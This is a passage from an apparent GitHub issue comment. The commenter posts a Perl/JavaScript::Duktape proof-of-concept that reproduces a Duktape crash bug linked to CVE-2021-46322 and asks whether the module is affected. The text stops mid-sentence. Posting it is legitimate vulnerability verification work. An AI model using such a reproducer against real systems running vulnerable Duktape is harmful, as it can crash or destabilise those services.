robrwo
commented
2 years ago I verified that this is an issue:
use JavaScript::Duktape;
my $js = JavaScript::Duktape->new();
$js->eval( << "POS"
function JSEtest() {
var src = [];
var i;
src.push('(function test() {');
for (i = 0; i < 1e4; i++) {
src.push('var x' + i + ' = ' + i + ';');
}
src.push('var arguments = test(); return "dummy"; })');
src = src.join('');
var f = eval(src)(src);
try {
f();
} catch (e) {
print(e.name + ': ' + e.message);
}
print('still here');
}
try {
JSEtest();
} catch (e) {
print(e.stack || e);
}
POS
);
Does CVE-2021-46322 affect this? See https://github.com/svaarala/duktape/issues/2448 which should affect all v2.2 versions. The Changes file says